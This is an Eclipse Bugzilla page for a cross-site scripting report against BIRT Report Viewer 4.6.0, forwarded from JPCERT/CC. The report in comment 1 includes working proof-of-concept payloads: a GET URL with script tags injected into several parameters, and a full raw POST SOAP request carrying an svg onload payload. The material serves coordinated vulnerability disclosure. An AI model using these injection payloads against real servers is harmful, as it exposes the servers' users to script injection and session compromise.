Bug 531688 - Report viewer is vulnerable to cross-site scripting
Summary: Report viewer is vulnerable to cross-site scripting
Status: NEW
Alias: None
Product: z_Archived
Classification: Eclipse Foundation
Component: BIRT (show other bugs)
Version: unspecified   Edit
Hardware: All All
: P3 normal (vote)
Target Milestone: ---   Edit
Assignee: Birt-ReportViewer CLA
QA Contact:
URL:
Whiteboard:
Keywords: security
Depends on:
Blocks:
 
Reported: 2018-02-26 11:50 EST by Benjamin Cabé CLA
Modified: 2020-01-10 11:42 EST (History)
3 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Benjamin Cabé CLA 2018-02-26 11:50:02 EST 
From the security@eclipse.org inbox:

Dear Eclipse Security Team,

Hello.  This is Hirozumi Nihonmatsu from JPCERT/CC.

Attached to this email is the original report and the details of 
the reported vulnerability.
The zip file is password-protected, and the password will be notified
by a separate email.

 - BIRT vulnerable to cross-site scripting

Please read through the report and return to us with the
information such as;
-validate the products, and whether the reported vulnerability
 is confirmed or not
-solutions (e.g., patch or module update)
-workarounds if any
-estimated time for creation of fixes
-preferable date for public release on your site
 *we will also publish an advisory for this issue on our
  vulnerability knowledge base, JVN,
  http://jvn.jp, http://jvn.jp/en/,
  synchronizing with your release schedule.

 **Caution**
 We have assigned the Vulnerability ID (VN) and its tracking
 number (TN) for this vulnerability issue;
   VN: JVN#53394617 / TN: JPCERT#95206031
 Please be sure to include these numbers in the subject line for
 future communication with us.  We appreciate your cooperation
 on this.

If you have any questions and concerns, please do not hesitate to
contact us any time.

Thank you in advance for your attention on this matter.
We are looking forward to hearing from you.

Sincerely yours,

Hirozumi Nihonmatsu
JPCERT/CC Vulnerability Handling Team

==================================================================
JPCERT Coordination Center (JPCERT/CC)
TEL: +81-3-3518-4600 FAX: +81-3-3518-4602 EMAIL: vuls@jpcert.or.jp
PGP key: 0xE46138B5: E9EA 6B5F 7C3B F3D6 5539  F758 4E9D 7E92 E461 38B5
https://www.jpcert.or.jp/english/
Comment 1 Benjamin Cabé CLA 2018-02-26 11:50:14 EST 
-----------------------------------------------------------------
Vulnerability Report for JVN#53394617 (begins here)
-----------------------------------------------------------------
[Title and VUL ID]
  - JVN#53394617
  - BIRT vulnerable to cross-site scripting
    
[Original finder/reporter's information]
  - Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.

[Affected product and version]
  - BIRT Report Viewer ver.4.6.0
    http://www.eclipse.org/birt/
    https://projects.eclipse.org/projects/birt

[Reproduction Procedure]
     <Scenario 1>
     Put below malicious link which will be sent with a GET parameter to the browser.
     
    http://<Hostname>/birt-viewer/run?__report=report%2FR_S05.rptdesign&__masterpage=true&__format=html&__parameterpage=false&PROJECT_ID=2&TICKET_ID=1xxx&__islocale=TICKET_IDxxx&TARGET_DATE_FROM=2011%2F04%2F01&__islocale=TARGET_DATE_FROM&TARGET_DATE_TO=2011%2F12%2F25&__islocale=TARGET_DATE_TO&INDEX=0&__islocale=INDEX&HELP_FLAG=true"><script>alert(7)</script>xxx&__islocale=HELP_FLAG&NEW_WINDOW_FLAG=false"><script>alert(6)</script>xxx&__islocale=NEW_WINDOW_FLAG&BIND_OFFSET=10"><script>alert(5)</script>xxx&__islocale=BIND_OFFSET&LIMMIT=10"><script>alert(4)</script>xxx&__islocale=LIMMIT&DRILL_FLAG=true"><script>alert(3)</script>xxxxx&__islocale=DRILL_FLAGxxxxx&DRILL_FIRST_FLAG=true"><script>alert(2)</script>xxxx&__islocale=DRILL_FIRST_FLAG&NAVI_CREATE_FLAG=NAVI_CREATE_FLAG"><script>alert(1)</script>xxxxxx&__islocale=NAVI_CREATE_FLAG

     <Scenario 2>
   POST /birt-viewer/frameset?__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html&__islocale=NAVI_CREATE_FLAG&__id=birtViewerR_M02&__sessionId=20170403_102433_278 HTTP/1.1
     Host: 192.168.153.132
     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
     Accept: */*
     Accept-Language: ja,en-US;q=0.7,en;q=0.3
     Referer: http://192.168.153.132/birt-viewer/frameset?__id=birtViewerR_M02&__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.4.0
     Content-Type: application/x-www-form-urlencoded, text/xml; charset=UTF-8
     SOAPAction: ""
     request-type: SOAP
     Content-Length: 1350
     Cookie: JSESSIONID=78E16375AA18933FBEB220A740EB64B6; _redmine_session=BAh7DToVaW1wb3J0ZXJfd3JhcHBlciIGIiIVZmlsZXNfaW5kZXhfc29ydCINZmlsZW5hbWU6DHVzZXJfaWRpBjoPc2Vzc2lvbl9pZCIlOTBiZDUyODhjZmJhNDRjNTUzODkwNTI0YjQ1MDc3MGM6EF9jc3JmX3Rva2VuIjFSMkJDWVJtRUpUYU1JTm5LcWN3TVZqdDBINmpac0I5T244MjdjdWdCWDhNPToWaW1wb3J0ZXJfZW5jb2RpbmciBlU6FWltcG9ydGVyX3RtcGZpbGUiNS90bXAvcmVkbWluZV9pbXBvcnRlcl9pcGZzYW1wbGVwcm9qZWN0X2FkbWluLmNzdjoWaW1wb3J0ZXJfc3BsaXR0ZXIiBiw%3D--9b9d1429e54db160dfa79ce9ec1f158865afc50d
     Connection: close

     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>ChangeParameter</Operator><Oprand><Name>CONDITION</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__CONDITION</Name><Value>?????°?????????</Value></Oprand><Oprand><Name>__islocale</Name><Value>THRESHOLD</Value></Oprand><Oprand><Name>THRESHOLD</Name><Value>&lt;svg onload=alert()&gt;</Value></Oprand><Oprand><Name>__isdisplay__THRESHOLD</Name><Value>&lt;svg onload=alert()&gt;</Value></Oprand><Oprand><Name>USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>__isdisplay__LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>__isdisplay__BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__svg</Name><Value>false</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value>2017-3-3-10-25-31-70</Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>]

[Proof-of-Concept Code]
  Written in "Reproduction Procedure" section above.

[CVSSv2 and v3 Scores]
-----------------------------------------------------------------
CVSSv2
-----------------------------------------------------------------
AV:N/AC:M/Au:N/C:N/I:P/A:N/BS:4.3
-----------------------------------------------------------------
CVSSv3
-----------------------------------------------------------------
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/BS:6.1
-----------------------------------------------------------------
-----------------------------------------------------------------
Vulnerability Report for JVN#53394617 (ends here)
-----------------------------------------------------------------
Comment 2 Benjamin Cabé CLA 2018-03-05 09:14:00 EST 
Has anyone had time to look at this?
Comment 3 Benjamin Cabé CLA 2018-05-17 10:51:03 EDT 
Hello? Does anybody intend to look at this?
Comment 4 Benjamin Cabé CLA 2018-07-03 10:41:34 EDT 
ping?
Comment 5 Wayne Beaton CLA 2020-01-10 11:42:41 EST 
Project team, there's help regarding how we handle vulnerability reports in the handbook.

https://www.eclipse.org/projects/handbook/#vulnerability